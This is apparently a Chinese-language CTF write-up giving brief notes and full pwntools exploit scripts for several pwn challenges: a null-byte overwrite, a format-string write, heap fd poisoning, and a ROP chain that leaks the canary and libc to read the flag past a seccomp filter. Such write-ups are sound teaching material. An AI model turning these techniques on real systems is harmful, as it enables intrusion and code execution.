没啥好说的自己菜
就做了三个
hello_pwn
没啥好说了直接连
from pwn import *
local=1
p=remote('139.129.76.65',50003)
p.interactive()
pwn me 100 years! (Ⅰ)
00截断然后直接覆盖
from pwn import *
p=remote('139.129.76.65',50004)
#p=process('./pwn_me_1')
payload='yes'.ljust(0x10,'\x00')
payload+='ffff'
p.sendline(payload)
p.interactive()
pwn me 100 years! (Ⅱ)
学习到了大师傅们的写入原来是不管\x00截断的我们需要注意的只有偏移和格式化字符串的位置,然后之后还是可以分位置写入的
from pwn import *
p=process('./pwn_me_2')
elf=ELF('./pwn_me_2')
offset=6
p.recvuntil('name:')
p.send('%p'*24)
base=int(p.recvuntil('d30')[-14:],16)-0xd30
flag_addr=base+0x2020E0
log.success('base: '+hex(base))
log.success('flag_addr: '+hex(flag_addr))
p.recvuntil('want?')
payload='%'+str(0x6666)+'d%10$hn%11$hn'
payload=payload.ljust(0x20,'\x00')
payload+=p64(flag_addr)+p64(flag_addr+2)
p.send(payload)
p.interactive()
print payload
pwn me 100 years! (Ⅲ)
很简单的堆题程序先申请了一个堆块只要数字等于0x66666666就会给你shell edit函数有溢出直接覆写size位然后free ,add将下一个chunk的fd写成首块chunk,add2次写入即可
from pwn import *
local=1
if local==1:
p=process('./pwn_me_3')
elf=ELF('./pwn_me_3')
else:
p=remote('1',1)
elf=ELF('./pwn_me_3')
def add(size,content):
p.recvuntil('5,exit')
p.sendline('1')
p.sendlineafter('size:',str(size))
p.sendafter('content:',content)
def delete(idx):
p.recvuntil('5,exit')
p.sendline('2')
p.sendlineafter('idx:',str(idx))
def show(idx):
p.recvuntil('5,exit')
p.sendline('3')
p.sendlineafter('idx:',str(idx))
def edit(idx,content):
p.recvuntil('5,exit')
p.sendline('4')
p.sendlineafter('idx:',str(idx))
p.send(content)
def exp():
#gdb.attach(p,'b *0x0400B93')
add(0x18,'aaaa') #idx 0
add(0x10,'bbbb') #idx 1
add(0x10,'cccc') #idx 2
add(0x10,'dddd') #idx 3
delete(3)
delete(2)
edit(0,'a'*0x18+p64(0x41))
delete(1)
add(0x30,'\x00'*24+p64(0x21)+p8(0))
#add(0x30,'aaaa')
add(0x10,'a')
add(0x10,p64(0x66666666))
#gdb.attach(p,'b *0x0400C2A')
#show(0)
p.interactive()
if __name__=="__main__":
exp()
warmup
开了沙箱过滤了execve直接读呗…
from pwn import *
from LibcSearcher import *
local=0
if local==1:
p=process('./warm_up')
elf=ELF('./warm_up')
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
else:
p=remote('139.129.76.65',50007)
elf=ELF('./warm_up')
libc=ELF('./libc-2.23.so')
pop_rdi=0x000400bc3
pop_rsi_r15=0x000400bc1
flag_addr=0x6010b0
def su(address):
log.success('address :'+hex(address))
def exp():
p.recvuntil('!!!')
p.sendline(0x18*'a')
p.recvuntil('aaaaa\n')
canary=u64(p.recv(7).rjust(8,'\x00'))
log.success('canary: '+hex(canary))
pd='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x00400AB6)
p.recvuntil(' ?')
p.sendline(pd)
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success('put_addr: '+hex(put_addr))
libcbase=put_addr-libc.symbols['puts']
open_addr=libcbase+0x0F7049
log.success('open_addr: '+hex(open_addr))
write_addr=libcbase+0x00F72B0
read_addr=libcbase+0x0F7250
pop_rdx=libcbase+0x00001b92
pop_rsi=libcbase+0x0202e8
p.recvuntil('!!!')
p.sendline('binbin')
payload='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(flag_addr)+p64(0x8)+p64(elf.symbols['read'])
payload+=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(open_addr)+p64(pop_rdi)+p64(3)
payload+=p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x100)+p64(read_addr)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)
payload+=p64(pop_rdx)+p64(0x100)+p64(write_addr)
p.recvuntil(' ?')
p.send(payload)
sleep(1)
p.send('flag')
p.send('\n')
p.interactive()
if __name__=="__main__":
exp()
后面的easy_rop,easy_heap没看了
